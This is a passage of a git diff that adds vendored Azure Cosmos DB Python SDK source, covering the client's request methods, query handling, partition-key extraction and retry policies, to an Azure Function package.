+ The read Offer.
+ :rtype:
+ dict
+
+ """
+ path = base.GetPathFromLink(offer_link)
+ offer_id = base.GetResourceIdOrFullNameFromLink(offer_link)
+ return self.Read(path, "offers", offer_id, None, {}, **kwargs)
+
+ def ReadOffers(self, options=None, **kwargs):
+ """Reads all offers.
+
+ :param dict options:
+ The request options for the request
+
+ :return:
+ Query Iterable of Offers.
+ :rtype:
+ query_iterable.QueryIterable
+
+ """
+ if options is None:
+ options = {}
+
+ return self.QueryOffers(None, options, **kwargs)
+
+ def QueryOffers(self, query, options=None, **kwargs):
+ """Query for all offers.
+
+ :param (str or dict) query:
+ :param dict options:
+ The request options for the request
+
+ :return:
+ Query Iterable of Offers.
+ :rtype:
+ query_iterable.QueryIterable
+
+ """
+ if options is None:
+ options = {}
+
+ def fetch_fn(options):
+ return (
+ self.__QueryFeed(
+ "/offers", "offers", "", lambda r: r["Offers"], lambda _, b: b, query, options, **kwargs
+ ),
+ self.last_response_headers,
+ )
+
+ return ItemPaged(
+ self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable
+ )
+
+ def GetDatabaseAccount(self, url_connection=None, **kwargs):
+ """Gets database account info.
+
+ :return:
+ The Database Account.
+ :rtype:
+ documents.DatabaseAccount
+
+ """
+ if url_connection is None:
+ url_connection = self.url_connection
+
+ initial_headers = dict(self.default_headers)
+ headers = base.GetHeaders(self, initial_headers, "get", "", "", "", {})  # path, id and type are empty
+
+ request_params = _request_object.RequestObject("databaseaccount", documents._OperationType.Read, url_connection)
+ result, self.last_response_headers = self.__Get("", request_params, headers, **kwargs)
+ database_account = documents.DatabaseAccount()
+ database_account.DatabasesLink = "/dbs/"
+ database_account.MediaLink = "/media/"
+ if http_constants.HttpHeaders.MaxMediaStorageUsageInMB in self.last_response_headers:
+ database_account.MaxMediaStorageUsageInMB = self.last_response_headers[
+ http_constants.HttpHeaders.MaxMediaStorageUsageInMB
+ ]
+ if http_constants.HttpHeaders.CurrentMediaStorageUsageInMB in self.last_response_headers:
+ database_account.CurrentMediaStorageUsageInMB = self.last_response_headers[
+ http_constants.HttpHeaders.CurrentMediaStorageUsageInMB
+ ]
+ database_account.ConsistencyPolicy = result.get(constants._Constants.UserConsistencyPolicy)
+
+ # WritableLocations and ReadableLocations fields will be available only for geo-replicated database accounts
+ if constants._Constants.WritableLocations in result:
+ database_account._WritableLocations = result[constants._Constants.WritableLocations]
+ if constants._Constants.ReadableLocations in result:
+ database_account._ReadableLocations = result[constants._Constants.ReadableLocations]
+ if constants._Constants.EnableMultipleWritableLocations in result:
+ database_account._EnableMultipleWritableLocations = result[
+ constants._Constants.EnableMultipleWritableLocations
+ ]
+
+ self._useMultipleWriteLocations = (
+ self.connection_policy.UseMultipleWriteLocations and database_account._EnableMultipleWritableLocations
+ )
+ return database_account
+
+ def Create(self, body, path, typ, id, initial_headers, options=None, **kwargs): # pylint: disable=redefined-builtin
+ """Creates an Azure Cosmos resource and returns it.
+
+ :param dict body:
+ :param str path:
+ :param str typ:
+ :param str id:
+ :param dict initial_headers:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The created Azure Cosmos resource.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ initial_headers = initial_headers or self.default_headers
+ headers = base.GetHeaders(self, initial_headers, "post", path, id, typ, options)
+ # Create will use WriteEndpoint since it uses POST operation
+
+ request_params = _request_object.RequestObject(typ, documents._OperationType.Create)
+ result, self.last_response_headers = self.__Post(path, request_params, body, headers, **kwargs)
+
+ # update session for write request
+ self._UpdateSessionIfRequired(headers, result, self.last_response_headers)
+ return result
+
+ def Upsert(self, body, path, typ, id, initial_headers, options=None, **kwargs): # pylint: disable=redefined-builtin
+ """Upserts an Azure Cosmos resource and returns it.
+
+ :param dict body:
+ :param str path:
+ :param str typ:
+ :param str id:
+ :param dict initial_headers:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The upserted Azure Cosmos resource.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ initial_headers = initial_headers or self.default_headers
+ headers = base.GetHeaders(self, initial_headers, "post", path, id, typ, options)
+
+ headers[http_constants.HttpHeaders.IsUpsert] = True
+
+ # Upsert will use WriteEndpoint since it uses POST operation
+ request_params = _request_object.RequestObject(typ, documents._OperationType.Upsert)
+ result, self.last_response_headers = self.__Post(path, request_params, body, headers, **kwargs)
+ # update session for write request
+ self._UpdateSessionIfRequired(headers, result, self.last_response_headers)
+ return result
+
+ def Replace(self, resource, path, typ, id, initial_headers, options=None,
+ **kwargs): # pylint: disable=redefined-builtin
+ """Replaces an Azure Cosmos resource and returns it.
+
+ :param dict resource:
+ :param str path:
+ :param str typ:
+ :param str id:
+ :param dict initial_headers:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The new Azure Cosmos resource.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ initial_headers = initial_headers or self.default_headers
+ headers = base.GetHeaders(self, initial_headers, "put", path, id, typ, options)
+ # Replace will use WriteEndpoint since it uses PUT operation
+ request_params = _request_object.RequestObject(typ, documents._OperationType.Replace)
+ result, self.last_response_headers = self.__Put(path, request_params, resource, headers, **kwargs)
+
+ # update session for requests that mutate data on the server side
+ self._UpdateSessionIfRequired(headers, result, self.last_response_headers)
+ return result
+
+ def Read(self, path, typ, id, initial_headers, options=None, **kwargs): # pylint: disable=redefined-builtin
+ """Reads an Azure Cosmos resource and returns it.
+
+ :param str path:
+ :param str typ:
+ :param str id:
+ :param dict initial_headers:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The read Azure Cosmos resource.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ initial_headers = initial_headers or self.default_headers
+ headers = base.GetHeaders(self, initial_headers, "get", path, id, typ, options)
+ # Read will use ReadEndpoint since it uses GET operation
+ request_params = _request_object.RequestObject(typ, documents._OperationType.Read)
+ result, self.last_response_headers = self.__Get(path, request_params, headers, **kwargs)
+ return result
+
+ def DeleteResource(self, path, typ, id, initial_headers, options=None,
+ **kwargs): # pylint: disable=redefined-builtin
+ """Deletes an Azure Cosmos resource and returns it.
+
+ :param str path:
+ :param str typ:
+ :param str id:
+ :param dict initial_headers:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The deleted Azure Cosmos resource.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ initial_headers = initial_headers or self.default_headers
+ headers = base.GetHeaders(self, initial_headers, "delete", path, id, typ, options)
+ # Delete will use WriteEndpoint since it uses DELETE operation
+ request_params = _request_object.RequestObject(typ, documents._OperationType.Delete)
+ result, self.last_response_headers = self.__Delete(path, request_params, headers, **kwargs)
+
+ # update session for requests that mutate data on the server side
+ self._UpdateSessionIfRequired(headers, result, self.last_response_headers)
+
+ return result
+
+ def __Get(self, path, request_params, req_headers, **kwargs):
+ """Azure Cosmos 'GET' http request.
+
+ :param str path:
+ :param dict req_headers:
+
+ :return:
+ Tuple of (result, headers).
+ :rtype:
+ tuple of (dict, dict)
+
+ """
+ request = self.pipeline_client.get(url=path, headers=req_headers)
+ return synchronized_request.SynchronizedRequest(
+ client=self,
+ request_params=request_params,
+ global_endpoint_manager=self._global_endpoint_manager,
+ connection_policy=self.connection_policy,
+ pipeline_client=self.pipeline_client,
+ request=request,
+ request_data=None,
+ **kwargs
+ )
+
+ def __Post(self, path, request_params, body, req_headers, **kwargs):
+ """Azure Cosmos 'POST' http request.
+
+ :param str path:
+ :param (str, unicode, dict) body:
+ :param dict req_headers:
+
+ :return:
+ Tuple of (result, headers).
+ :rtype:
+ tuple of (dict, dict)
+
+ """
+ request = self.pipeline_client.post(url=path, headers=req_headers)
+ return synchronized_request.SynchronizedRequest(
+ client=self,
+ request_params=request_params,
+ global_endpoint_manager=self._global_endpoint_manager,
+ connection_policy=self.connection_policy,
+ pipeline_client=self.pipeline_client,
+ request=request,
+ request_data=body,
+ **kwargs
+ )
+
+ def __Put(self, path, request_params, body, req_headers, **kwargs):
+ """Azure Cosmos 'PUT' http request.
+
+ :param str path:
+ :param (str, unicode, dict) body:
+ :param dict req_headers:
+
+ :return:
+ Tuple of (result, headers).
+ :rtype:
+ tuple of (dict, dict)
+
+ """
+ request = self.pipeline_client.put(url=path, headers=req_headers)
+ return synchronized_request.SynchronizedRequest(
+ client=self,
+ request_params=request_params,
+ global_endpoint_manager=self._global_endpoint_manager,
+ connection_policy=self.connection_policy,
+ pipeline_client=self.pipeline_client,
+ request=request,
+ request_data=body,
+ **kwargs
+ )
+
+ def __Delete(self, path, request_params, req_headers, **kwargs):
+ """Azure Cosmos 'DELETE' http request.
+
+ :param str path:
+ :param dict req_headers:
+
+ :return:
+ Tuple of (result, headers).
+ :rtype:
+ tuple of (dict, dict)
+
+ """
+ request = self.pipeline_client.delete(url=path, headers=req_headers)
+ return synchronized_request.SynchronizedRequest(
+ client=self,
+ request_params=request_params,
+ global_endpoint_manager=self._global_endpoint_manager,
+ connection_policy=self.connection_policy,
+ pipeline_client=self.pipeline_client,
+ request=request,
+ request_data=None,
+ **kwargs
+ )
+
+ def QueryFeed(self, path, collection_id, query, options, partition_key_range_id=None, **kwargs):
+ """Query Feed for Document Collection resource.
+
+ :param str path:
+ Path to the document collection.
+ :param str collection_id:
+ Id of the document collection.
+ :param (str or dict) query:
+ :param dict options:
+ The request options for the request.
+ :param str partition_key_range_id:
+ Partition key range id.
+ :rtype:
+ tuple
+
+ """
+ return (
+ self.__QueryFeed(
+ path,
+ "docs",
+ collection_id,
+ lambda r: r["Documents"],
+ lambda _, b: b,
+ query,
+ options,
+ partition_key_range_id,
+ **kwargs
+ ),
+ self.last_response_headers,
+ )
+
+ def __QueryFeed(
+ self,
+ path,
+ typ,
+ id_,
+ result_fn,
+ create_fn,
+ query,
+ options=None,
+ partition_key_range_id=None,
+ response_hook=None,
+ is_query_plan=False,
+ **kwargs
+ ):
+ """Queries for more than one Azure Cosmos resource.
+
+ :param str path:
+ :param str typ:
+ :param str id_:
+ :param function result_fn:
+ :param function create_fn:
+ :param (str or dict) query:
+ :param dict options:
+ The request options for the request.
+ :param str partition_key_range_id:
+ Specifies partition key range id.
+ :param function response_hook:
+ :param bool is_query_plan:
+ Specifies whether the call is to fetch the query plan.
+
+ :rtype:
+ list
+
+ :raises SystemError: If the query compatibility mode is undefined.
+
+ """
+ if options is None:
+ options = {}
+
+ if query:
+ __GetBodiesFromQueryResult = result_fn
+ else:
+
+ def __GetBodiesFromQueryResult(result):
+ if result is not None:
+ return [create_fn(self, body) for body in result_fn(result)]
+ # If there is no change feed, the result data is empty and result is None.
+ # This case should be interpreted as an empty array.
+ return []
+
+ # Copy to make sure that default_headers won't be changed.
+ initial_headers = self.default_headers.copy()
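+ # Dispatch note: a None query below is served as a read-feed GET (also
+ # used for the query-plan fetch), while a non-None query is POSTed as SQL
+ # with a content type chosen from the client's query compatibility mode.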
+ if query is None:
+ # Query operations will use ReadEndpoint even though it uses GET (for feed requests)
+ request_params = _request_object.RequestObject(
+ typ, documents._OperationType.QueryPlan if is_query_plan else documents._OperationType.ReadFeed)
+ headers = base.GetHeaders(self, initial_headers, "get", path, id_, typ, options, partition_key_range_id)
+ result, self.last_response_headers = self.__Get(path, request_params, headers, **kwargs)
+ if response_hook:
+ response_hook(self.last_response_headers, result)
+ return __GetBodiesFromQueryResult(result)
+
+ query = self.__CheckAndUnifyQueryFormat(query)
+
+ initial_headers[http_constants.HttpHeaders.IsQuery] = "true"
+
+ if (
+ self._query_compatibility_mode == CosmosClientConnection._QueryCompatibilityMode.Default
+ or self._query_compatibility_mode == CosmosClientConnection._QueryCompatibilityMode.Query
+ ):
+ initial_headers[http_constants.HttpHeaders.ContentType] = runtime_constants.MediaTypes.QueryJson
+ elif self._query_compatibility_mode == CosmosClientConnection._QueryCompatibilityMode.SqlQuery:
+ initial_headers[http_constants.HttpHeaders.ContentType] = runtime_constants.MediaTypes.SQL
+ else:
+ raise SystemError("Unexpected query compatibility mode.")
+
+ # Query operations will use ReadEndpoint even though it uses POST (for regular query operations)
+ request_params = _request_object.RequestObject(typ, documents._OperationType.SqlQuery)
+ req_headers = base.GetHeaders(self, initial_headers, "post", path, id_, typ, options, partition_key_range_id)
+ result, self.last_response_headers = self.__Post(path, request_params, query, req_headers, **kwargs)
+
+ if response_hook:
+ response_hook(self.last_response_headers, result)
+
+ return __GetBodiesFromQueryResult(result)
+
+ def _GetQueryPlanThroughGateway(self, query, resource_link, **kwargs):
+ supported_query_features = (documents._QueryFeature.Aggregate + "," +
+ documents._QueryFeature.CompositeAggregate + "," +
+ documents._QueryFeature.Distinct + "," +
+ documents._QueryFeature.MultipleOrderBy + "," +
+ documents._QueryFeature.OffsetAndLimit + "," +
+ documents._QueryFeature.OrderBy + "," +
+ documents._QueryFeature.Top)
+
+ options = {
+ "contentType": runtime_constants.MediaTypes.Json,
+ "isQueryPlanRequest": True,
+ "supportedQueryFeatures": supported_query_features,
+ "queryVersion": http_constants.Versions.QueryVersion
+ }
+
+ resource_link = base.TrimBeginningAndEndingSlashes(resource_link)
+ path = base.GetPathFromLink(resource_link, "docs")
+ resource_id = base.GetResourceIdOrFullNameFromLink(resource_link)
+
+ return self.__QueryFeed(path,
+ "docs",
+ resource_id,
+ lambda r: r,
+ None,
+ query,
+ options,
+ is_query_plan=True,
+ **kwargs)
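+ # Accepted query shapes in the Default/Query compatibility modes, as
+ # unified by __CheckAndUnifyQueryFormat below (illustrative values):
+ #
+ #     "SELECT * FROM c"        ->  {"query": "SELECT * FROM c"}
+ #     {"query": "SELECT * FROM c WHERE c.id = @id",
+ #      "parameters": [{"name": "@id", "value": "order-1"}]}  ->  unchanged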
+ def __CheckAndUnifyQueryFormat(self, query_body):
+ """Checks and unifies the format of the query body.
+
+ :raises TypeError: If query_body is not of expected type (depending on the query compatibility mode).
+ :raises ValueError: If query_body is a dict but doesn't have valid query text.
+ :raises SystemError: If the query compatibility mode is undefined.
+
+ :param (str or dict) query_body:
+
+ :return:
+ The formatted query body.
+ :rtype:
+ dict or string
+ """
+ if (
+ self._query_compatibility_mode == CosmosClientConnection._QueryCompatibilityMode.Default
+ or self._query_compatibility_mode == CosmosClientConnection._QueryCompatibilityMode.Query
+ ):
+ if not isinstance(query_body, dict) and not isinstance(query_body, str):
+ raise TypeError("query body must be a dict or string.")
+ if isinstance(query_body, dict) and not query_body.get("query"):
+ raise ValueError('query body must have valid query text with key "query".')
+ if isinstance(query_body, str):
+ return {"query": query_body}
+ elif (
+ self._query_compatibility_mode == CosmosClientConnection._QueryCompatibilityMode.SqlQuery
+ and not isinstance(query_body, str)
+ ):
+ raise TypeError("query body must be a string.")
+ else:
+ raise SystemError("Unexpected query compatibility mode.")
+
+ return query_body
+
+ @staticmethod
+ def __ValidateResource(resource):
+ id_ = resource.get("id")
+ if id_:
+ try:
+ if id_.find("/") != -1 or id_.find("\\") != -1 or id_.find("?") != -1 or id_.find("#") != -1:
+ raise ValueError("Id contains illegal chars.")
+
+ if id_[-1] == " ":
+ raise ValueError("Id ends with a space.")
+ except AttributeError:
+ raise_with_traceback(TypeError, message="Id type must be a string.")
+
+ # Adds the partition key to options
+ def _AddPartitionKey(self, collection_link, document, options):
+ collection_link = base.TrimBeginningAndEndingSlashes(collection_link)
+
+ # TODO: Refresh the cache if partition is extracted automatically and we get a 400.1001
+
+ # If the document collection link is present in the cache, then use the cached partition key definition
+ if collection_link in self.partition_key_definition_cache:
+ partitionKeyDefinition = self.partition_key_definition_cache.get(collection_link)
+ # Else read the collection from the backend and add it to the cache
+ else:
+ collection = self.ReadContainer(collection_link)
+ partitionKeyDefinition = collection.get("partitionKey")
+ self.partition_key_definition_cache[collection_link] = partitionKeyDefinition
+
+ # If the collection doesn't have a partition key definition, skip it as it's a legacy collection
+ if partitionKeyDefinition:
+ # If the user has passed in the partitionKey in options, use that; else extract it from the document
+ if "partitionKey" not in options:
+ partitionKeyValue = self._ExtractPartitionKey(partitionKeyDefinition, document)
+ options["partitionKey"] = partitionKeyValue
+
+ return options
+
+ # Extracts the partition key from the document using the partitionKey definition
+ def _ExtractPartitionKey(self, partitionKeyDefinition, document):
+
+ # Parses the paths into a list of tokens, each representing a property
+ partition_key_parts = base.ParsePaths(partitionKeyDefinition.get("paths"))
+ # Check if the partitionKey is system generated or not
+ is_system_key = partitionKeyDefinition["systemKey"] if "systemKey" in partitionKeyDefinition else False
+
+ # Navigates the document to retrieve the partitionKey specified in the paths
+ return self._retrieve_partition_key(partition_key_parts, document, is_system_key)
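+ # Illustrative walk performed by _retrieve_partition_key below for a
+ # partition key definition with paths ["/address/zip"] (path parsing
+ # simplified; base.ParsePaths also handles quoting):
+ #
+ #     doc = {"id": "1", "address": {"zip": "98052"}}
+ #     parts = ["address", "zip"]
+ #     doc["address"]["zip"]   # -> "98052", used as options["partitionKey"]
+ #     # a missing sub-property instead yields _Undefined (or _Empty for
+ #     # system-generated keys)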
+ # Navigates the document to retrieve the partitionKey specified in the partition key parts
+ def _retrieve_partition_key(self, partition_key_parts, document, is_system_key):
+ expected_matchCount = len(partition_key_parts)
+ matchCount = 0
+ partitionKey = document
+
+ for part in partition_key_parts:
+ # At any point if we don't find the value of a sub-property in the document, we return as Undefined
+ if part not in partitionKey:
+ return self._return_undefined_or_empty_partition_key(is_system_key)
+
+ partitionKey = partitionKey.get(part)
+ matchCount += 1
+ # Once we reach the "leaf" value (not a dict), we break from the loop
+ if not isinstance(partitionKey, dict):
+ break
+
+ # Match the count of hops we did to get the partitionKey with the length of
+ # partition key parts and validate that it's not a dict at that level
+ if (matchCount != expected_matchCount) or isinstance(partitionKey, dict):
+ return self._return_undefined_or_empty_partition_key(is_system_key)
+
+ return partitionKey
+
+ def refresh_routing_map_provider(self):
+ # re-initializes the routing map provider, effectively refreshing the current partition key range cache
+ self._routing_map_provider = routing_map_provider.SmartRoutingMapProvider(self)
+
+ def _UpdateSessionIfRequired(self, request_headers, response_result, response_headers):
+ """
+ Updates session if necessary.
+
+ :param dict request_headers:
+ :param dict response_result:
+ :param dict response_headers:
+
+ :return:
+ None, but updates the client session if necessary.
+
+ """
+
+ # if this request was made with consistency level as session, then update the session
+ if response_result is None or response_headers is None:
+ return
+
+ is_session_consistency = False
+ if http_constants.HttpHeaders.ConsistencyLevel in request_headers:
+ if documents.ConsistencyLevel.Session == request_headers[http_constants.HttpHeaders.ConsistencyLevel]:
+ is_session_consistency = True
+
+ if is_session_consistency:
+ # update session
+ self.session.update_session(response_result, response_headers)
+
+ @staticmethod
+ def _return_undefined_or_empty_partition_key(is_system_key):
+ if is_system_key:
+ return _Empty
+ return _Undefined
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_default_retry_policy.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_default_retry_policy.py
new file mode 100644
index 0000000..245c43f
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_default_retry_policy.py
@@ -0,0 +1,80 @@
+# The MIT License (MIT)
+# Copyright (c) 2017 Microsoft Corporation
+
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the "Software"), to deal
+# in the Software without restriction, including without limitation the rights
+# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+# copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+
+# The above copyright notice and this permission notice shall be included in all
+# copies or substantial portions of the Software.
+
+# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+# SOFTWARE.
+
+"""Internal class for connection reset retry policy implementation in the Azure
+Cosmos database service.
+"""
+from .
import http_constants + +# pylint: disable=protected-access + + +class DefaultRetryPolicy(object): + + error_codes = http_constants._ErrorCodes + CONNECTION_ERROR_CODES = [ + error_codes.WindowsInterruptedFunctionCall, + error_codes.WindowsFileHandleNotValid, + error_codes.WindowsPermissionDenied, + error_codes.WindowsBadAddress, + error_codes.WindowsInvalidArgumnet, + error_codes.WindowsResourceTemporarilyUnavailable, + error_codes.WindowsOperationNowInProgress, + error_codes.WindowsAddressAlreadyInUse, + error_codes.WindowsConnectionResetByPeer, + error_codes.WindowsCannotSendAfterSocketShutdown, + error_codes.WindowsConnectionTimedOut, + error_codes.WindowsConnectionRefused, + error_codes.WindowsNameTooLong, + error_codes.WindowsHostIsDown, + error_codes.WindowsNoRouteTohost, + error_codes.LinuxConnectionReset, + ] + + def __init__(self, *args): + self._max_retry_attempt_count = 10 + self.current_retry_attempt_count = 0 + self.retry_after_in_milliseconds = 1000 + self.args = args + + def needsRetry(self, error_code): + if error_code in DefaultRetryPolicy.CONNECTION_ERROR_CODES: + if self.args: + if (self.args[3].method == "GET") or (http_constants.HttpHeaders.IsQuery in self.args[3].headers) \ + or (http_constants.HttpHeaders.IsQueryPlanRequest in self.args[3].headers): + return True + return False + return True + return False + + def ShouldRetry(self, exception): + """Returns true if should retry based on the passed-in exception. + + :param (exceptions.CosmosHttpResponseError instance) exception: + :rtype: boolean + + """ + if (self.current_retry_attempt_count < self._max_retry_attempt_count) and self.needsRetry( + exception.status_code + ): + self.current_retry_attempt_count += 1 + return True + return False diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_endpoint_discovery_retry_policy.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_endpoint_discovery_retry_policy.py new file mode 100644 index 0000000..d9a922f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_endpoint_discovery_retry_policy.py @@ -0,0 +1,100 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for endpoint discovery retry policy implementation in the +Azure Cosmos database service. 
+""" + +import logging +from azure.cosmos.documents import _OperationType + +logger = logging.getLogger(__name__) +logger.setLevel(logging.INFO) +log_formatter = logging.Formatter("%(levelname)s:%(message)s") +log_handler = logging.StreamHandler() +log_handler.setFormatter(log_formatter) +logger.addHandler(log_handler) + + +class EndpointDiscoveryRetryPolicy(object): + """The endpoint discovery retry policy class used for geo-replicated database accounts + to handle the write forbidden exceptions due to writable/readable location changes + (say, after a failover). + """ + + Max_retry_attempt_count = 120 + Retry_after_in_milliseconds = 1000 + + def __init__(self, connection_policy, global_endpoint_manager, *args): + self.global_endpoint_manager = global_endpoint_manager + self._max_retry_attempt_count = EndpointDiscoveryRetryPolicy.Max_retry_attempt_count + self.failover_retry_count = 0 + self.retry_after_in_milliseconds = EndpointDiscoveryRetryPolicy.Retry_after_in_milliseconds + self.connection_policy = connection_policy + self.request = args[0] if args else None + # clear previous location-based routing directive + if self.request: + self.request.clear_route_to_location() + + # Resolve the endpoint for the request and pin the resolution to the resolved endpoint + # This enables marking the endpoint unavailability on endpoint failover/unreachability + self.location_endpoint = self.global_endpoint_manager.resolve_service_endpoint(self.request) + self.request.route_to_location(self.location_endpoint) + + def ShouldRetry(self, exception): # pylint: disable=unused-argument + """Returns true if should retry based on the passed-in exception. + + :param (exceptions.CosmosHttpResponseError instance) exception: + :rtype: boolean + + """ + if not self.connection_policy.EnableEndpointDiscovery: + return False + + if self.failover_retry_count >= self.Max_retry_attempt_count: + return False + + self.failover_retry_count += 1 + + if self.location_endpoint: + if _OperationType.IsReadOnlyOperation(self.request.operation_type): + # Mark current read endpoint as unavailable + self.global_endpoint_manager.mark_endpoint_unavailable_for_read(self.location_endpoint) + else: + self.global_endpoint_manager.mark_endpoint_unavailable_for_write(self.location_endpoint) + + # set the refresh_needed flag to ensure that endpoint list is + # refreshed with new writable and readable locations + self.global_endpoint_manager.refresh_needed = True + + # clear previous location-based routing directive + self.request.clear_route_to_location() + + # set location-based routing directive based on retry count + # simulating single master writes by ensuring usePreferredLocations + # is set to false + self.request.route_to_location_with_preferred_location_flag(self.failover_retry_count, False) + + # Resolve the endpoint for the request and pin the resolution to the resolved endpoint + # This enables marking the endpoint unavailability on endpoint failover/unreachability + self.location_endpoint = self.global_endpoint_manager.resolve_service_endpoint(self.request) + self.request.route_to_location(self.location_endpoint) + return True diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__init__.py new file mode 100644 index 0000000..c8cc2af --- /dev/null +++ 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__init__.py @@ -0,0 +1,20 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..856c1f7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/aggregators.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/aggregators.cpython-39.pyc new file mode 100644 index 0000000..cf6cfee Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/aggregators.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/base_execution_context.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/base_execution_context.cpython-39.pyc new file mode 100644 index 0000000..52da105 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/base_execution_context.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/document_producer.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/document_producer.cpython-39.pyc new file mode 100644 index 0000000..f481612 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/document_producer.cpython-39.pyc differ diff --git 
